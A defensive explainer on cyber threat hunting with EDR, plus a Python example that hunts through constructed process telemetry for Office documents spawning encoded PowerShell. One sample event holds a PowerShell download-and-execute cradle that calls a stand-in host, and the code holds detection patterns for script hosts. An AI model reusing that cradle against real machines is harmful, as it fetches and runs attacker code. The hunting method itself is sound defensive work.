While many organizations deploy cybersecurity solutions such as endpoint protection platforms (EPP), an estimated 10% of cyberthreats, including new, unknown and evasive threats such as many strains of ransomware, are capable of bypassing these defences.
Threat hunting starts from the assumption that, even though an organization's existing security controls have not detected or reported anything, the organization has in fact already been compromised and some kind of threat is already active in the environment.
Threat hunting then uses tools such as endpoint detection and response (EDR), together with clearly defined, structured (typically hypothesis-driven) processes, to spot the telltale signs that a breach has occurred and to identify it.
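The following is an added illustration of what such a hunt looks like in practice; it is not code from the original article or from any EDR vendor. It assumes a hypothetical hunt hypothesis ("an intruder already inside is using a document-borne macro to launch an encoded PowerShell command"), a constructed batch of EDR-style process-creation events with made-up hosts, timestamps and a reserved example.invalid URL, and two common hunting techniques: matching a suspicious parent-child process relationship and frequency-stacking parent-child pairs so that rare ones surface as leads.

```python
"""Hypothesis-driven hunt over constructed EDR process-creation telemetry.

Hunt hypothesis (hypothetical, for illustration): an attacker already inside
the network is using an Office document to spawn a script interpreter with an
encoded command. The events below imitate the fields an EDR agent commonly
records (host, timestamp, parent process, child process, command line); they
are constructed sample data, not real logs.
"""
import base64
import re
from collections import Counter

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}

# Common spellings of PowerShell's -EncodedCommand switch followed by a base64 token.
# (PowerShell itself accepts any unambiguous prefix; this covers the usual ones.)
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def encode_powershell(ps: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64.
    Used only to build the constructed sample event below."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (hypothetical hosts and timestamps). Most of it is
# routine noise; one event on ws01 matches the hypothesis.
EVENTS = [
    {"host": "ws01", "ts": "2024-05-01T09:02:11Z", "parent": "explorer.exe", "image": "winword.exe", "cmdline": "winword.exe /n report.docx"},
    {"host": "ws02", "ts": "2024-05-01T09:05:43Z", "parent": "explorer.exe", "image": "winword.exe", "cmdline": "winword.exe /n notes.docx"},
    {"host": "ws03", "ts": "2024-05-01T09:07:02Z", "parent": "explorer.exe", "image": "winword.exe", "cmdline": "winword.exe"},
    {"host": "ws01", "ts": "2024-05-01T09:00:01Z", "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws02", "ts": "2024-05-01T09:00:03Z", "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws02", "ts": "2024-05-01T10:12:30Z", "parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell.exe"},  # admin's interactive shell
    {"host": "ws01", "ts": "2024-05-01T09:02:40Z", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"host": "ws03", "ts": "2024-05-01T09:30:15Z", "parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none or it
    is not valid base64/UTF-16LE (a malformed token is left unresolved, not fatal)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Apply the hypothesis to each event; return the events that match, with the
    reasons a hunter would write into a case note."""
    findings = []
    for ev in events:
        parent, image = ev["parent"].lower(), ev["image"].lower()
        reasons = []
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            reasons.append(f"office app {parent} spawned {image}")
        decoded = decode_encoded_command(ev["cmdline"]) if image == "powershell.exe" else None
        if decoded is not None:
            reasons.append(f"encoded PowerShell: {decoded}")
        if reasons:
            findings.append({"host": ev["host"], "ts": ev["ts"], "reasons": reasons})
    return findings


def stack_parent_child(events):
    """Frequency-stack parent->child pairs across the fleet. Common pairs are
    usually baseline behaviour; rare pairs are where a hunter looks first."""
    return Counter((e["parent"].lower(), e["image"].lower()) for e in events)


def rare_pairs(events, max_count=1):
    """Parent->child pairs seen at most max_count times, sorted for review."""
    return sorted(p for p, n in stack_parent_child(events).items() if n <= max_count)


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["ts"], "; ".join(f["reasons"]))
    print("rare parent->child pairs:", rare_pairs(EVENTS))
```

Run against the sample data, the hunt isolates the single winword.exe -> powershell.exe event on ws01 and prints the decoded download cradle, while the stacking step lists that pair next to the two other one-off pairs (the admin's interactive shell and the lone browser launch) for the hunter to triage. In a real hunt the event list would come from the EDR's query API, the parent-child rule would be one of several hypotheses, and every lead would be checked against a known baseline before being escalated to incident response.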